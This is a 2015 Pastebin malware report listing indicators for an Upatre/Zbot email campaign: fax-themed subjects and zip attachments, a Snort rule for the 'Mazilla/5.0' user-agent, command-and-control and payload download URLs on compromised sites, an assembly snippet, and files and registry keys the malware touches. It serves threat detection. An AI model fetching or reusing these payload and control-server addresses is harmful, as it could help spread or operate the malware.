Advertisement
Neonprimetime

Upatre Zbot [email protected] Alina-FAX lojasdeouro.com

Apr 6th, 2015
548
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.42 KB | None | 0 0
  1. Trojan.Downloader.Upatre Email Campaign
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. Subject(s):
  7. Alina-FAX pNxXCD_864975
  8. Alina-FAX VxBElw_165562
  9. Alina-FAX ydkQrc_045052
  10. cGKZn7_902344
  11. 7wLntD_102365
  12. Alina-FAX k6vw9d_163911
  13. Alina-FAX Oe9BXH_737904
  14. Alina-FAX T9wKzF_930430
  15. Alina-FAX TgyhYW_268841
  16. Alina-FAX 3E4ymh_658825
  17. Alina-FAX 9tcT0i_490824
  18. Alina-FAX oW39tV_753875
  19. Attachments(s):
  20. pNxXCD_864975.zip
  21. VxBElw_165562.zip
  22. ydkQrc_045052.zip
  23. cGKZn7_902344.zip
  24. 7wLntD_102365.zip
  25. k6vw9d_163911.zip
  26. Oe9BXH_737904.zip
  27. T9wKzF_930430.zip
  28. TgyhYW_268841.zip
  29. 3E4ymh_658825.zip
  30. 9tcT0i_490824.zip
  31. oW39tV_753875.zip
  32.  
  33. *****
  34. Matches:
  35.  
  36. Trojan.Zbot
  37.  
  38. Suspicious.JIT.a
  39.  
  40.  
  41. BLACKLIST User-Agent known malicious user-agent string - Mazilla/5.0 - Win.Backdoor.Upatre (1:33207)
  42.  
  43. alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"BLACKLIST User-Agent known malicious user-agent string - Mazilla/5.0 - Win.Backdoor.Upatre"; flow:to_server,established; content:"User-Agent: Mazilla/5.0|0D 0A|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, ruleset community, service http; classtype:trojan-activity; sid:33207; rev:2; )
  44. *****
  45.  
  46. 216.146.43.70
  47. GET http://checkip.dyndns.org/
  48. User-Agent: Mazilla/5.0::
  49.  
  50. 141.105.141.87
  51. GET http://141.105.141.87:13878/0604uk21/<REDACTED WORKSTATION NAME>/41/1/1/EMLBEMDBFGEBEI
  52. User-Agent: Mazilla/5.0
  53.  
  54. 162.252.57.88
  55. GET http://encomiendaexpress.com/es/images/mut103.png
  56. User-Agent: Mazilla/5.0
  57.  
  58. 5.206.231.133
  59. GET http://lojasdeouro.com/wp-includes/images/mut103.png
  60. User-Agent: Mazilla/5.0
  61.  
  62. ****
  63. Files touched or accessed:
  64.  
  65. C:\Users\Administrator\AppData\Local\Temp\eisqwp.exe
  66. C:\Windows\System32\WOW64LOG.DLL
  67. C:\Users\ADMINI~1\AppData\Local\Temp\CRTDLL.DLL
  68. C:\Users\ADMINI~1\AppData\Local\Temp\VERSION.DLL
  69. C:\Users\ADMINI~1\AppData\Local\Temp\DWMAPI.DLL
  70. C:\Users\ADMINI~1\AppData\Local\Temp\RICHED32.DLL
  71. C:\Windows\SysWOW64\RPCSS.DLL
  72. C:\Users\Administrator\AppData\Local\Temp\dmiB03A.tmp
  73. C:\Windows\SysWOW64\cmd.exe
  74. C:\Users\ADMINI~1\AppData\Local\Temp\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL
  75. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
  76. C:\Users\ADMINI~1\AppData\Local\Temp\IPHLPAPI.DLL
  77. C:\Users\ADMINI~1\AppData\Local\Temp\WINNSI.DLL
  78. C:\Users\ADMINI~1\AppData\Local\Temp\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL
  79. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
  80. C:\Users\ADMINI~1\AppData\Local\Temp\DHCPCSVC.DLL
  81. C:\Users\ADMINI~1\AppData\Local\Temp\CRYPTSP.DLL
  82. C:\Users\ADMINI~1\AppData\Local\Temp\RPCRTREMOTE.DLL
  83.  
  84. ****
  85. Assembly utilized:
  86.  
  87. 71C9FCE1 movzx eax, ax;71C9FCE4 push eax;71C9FCE5 call 0xffffffffffff74a4;71C9FCEA push dword 0x71c9fff0;71C9FCEF mov [ebp-0x8], eax;71C9FCF2 call 0xffffffffffffcf61;71C9FCF7 push 0x11;71C9FCF9 movzx eax, ax;71C9FCFC mov esi, 0x89;71C9FD01 push esi;
  88.  
  89. ****
  90. Registries touched or accessed:
  91.  
  92. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  93. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
  94. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
  95. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
  96. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoDetect"
  97. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1c 00 00 00 09 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0a 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  98. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
  99. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
  100. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
  101. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  102. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  103. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  104. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\"CachePrefix" = Cookie:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement